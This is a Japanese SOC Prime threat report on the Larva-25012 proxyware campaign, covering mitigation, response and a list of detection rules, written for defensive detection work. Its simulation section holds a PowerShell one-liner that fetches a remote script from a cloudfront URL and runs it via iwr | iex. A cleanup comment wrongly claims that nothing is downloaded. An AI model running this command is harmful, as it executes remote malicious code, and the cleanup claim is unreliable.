SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012: 2026年のプロキシウェア配布キャンペーン

Author Photo
SOC Prime Team linkedin icon フォローする
Larva-25012: 2026年のプロキシウェア配布キャンペーン
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

Larva-25012 脅威アクターは、ユーザーのインターネット帯域幅を乗っ取ることで、侵害されたシステムをマネタイズするためにProxywareを積極的に配布しています。このキャンペーンは既存のDPLoader感染に基づいており、YouTubeダウンロードウェブサイトやGitHubを含む複数の配布チャネルに依存しています。このマルウェアは、DigitalPulse、SOAX、Appsalt、IPRoyalを含むいくつかのProxywareファミリーを展開します。

調査

AhnLabセキュリティインテリジェンスセンター(ASEC)は進行中のプロキシジャック活動を追跡し、2026年後半に更新されたLarva-25012の操作を特定しました。調査では、攻撃者が持続性を維持しPowerShellコマンドを実行するためにDPLoaderのJavaScriptとPythonバージョンの両方を利用していることが判明しました。また、スケジュールされたタスクも作成され、侵害されたシステムで悪意のあるスクリプトが継続して実行されるようにします。

緩和策

ユーザーは、疑わしいウェブサイト、ポップアップ広告、または非公式のファイル共有プラットフォームから実行ファイルをダウンロードすることを避けるべきです。ソフトウェアは信頼できる正規のソースからのみ入手し、クラックされたアプリケーションや違法なダウンロードサイトは避けるべきです。組織は、V3を含むエンドポイント保護ソリューションを最新の状態に保つべきです。

対応策

疑わしい活動が検出された場合、管理者は影響を受けたProxywareファミリーに関連する悪意のあるPowerShellプロセスやスケジュールされたタスクを特定して終了するべきです。また、キーファクターとしての感染と持続性の役割を果たすDPLoaderを確認し、既知または疑わしいC2インフラへの無許可接続を含む外向きネットワークトラフィックを確認するべきです。

攻撃フロー

この部分はまだ更新中です。

検出

Powershellを介したダウンロードまたはアップロード (cmdline経由)

SOC Prime チーム
2026年9月22日

疑わしいNodeJS子プロセス[Windows] (cmdline経由)

SOC Prime チーム
2026年9月22日

Windows Defenderリアルタイムモニタリングの無効化とその他の設定変更 (cmdline経由)

SOC Prime チーム
2026年9月22日

Powershellからの疑わしい.NETメソッドの呼び出し (powershell経由)

SOC Prime チーム
2026年9月22日

Cloudflare開発ドメインの悪用の可能性 (dns経由)

SOC Prime チーム
2026年9月22日

IOC(HashMd5)で検出: Larva-25012: 2026年のProxyware配布キャンペーン

SOC Prime AI ルール
2026年9月22日

PowerShell Proxywareインストールスクリプトの検出 [Windows Powershell]

SOC Prime AI ルール
2026年9月22日

シミュレーション実行

  • 攻撃のストーリー&コマンド: 許可されていない帯域幅使用のためにプロキシウェア(Larva-25012)をインストールしようとする敵対者は、PowerShellワンライナーを実行します。目的は、ペイロードをメモリに直接ダウンロードすることでローカルファイルスキャンを回避することです。彼らは、 -ExecutionPolicy Bypass フラグを使用してスクリプトが実行されるようにし、 iwr Cloudfront配信からファイルを取得し、 iex にパイプして即座に実行します。この特定のコマンドラインは、検出ルールのターゲットとなるシグネチャの一つです。

  • リグレッションテストスクリプト:

    # Larva-25012 Proxywareインストールのシミュレーション
    # このコマンドは、検出ルールのselection2に一致するよう具体的に設計されています。
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # コマンドラインが新しいプロセスイベントとしてキャプチャされるようにStart-Processを使用します
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • クリーンアップコマンド:

    # シミュレーションの'iex'パイプの性質により、実際にファイルがダウンロードされることはありませんが、
    # アーティファクトが作成された場合、ここで削除されます。
    Write-Host "シミュレーションクリーンアップ完了。持続するアーティファクトは作成されませんでした。"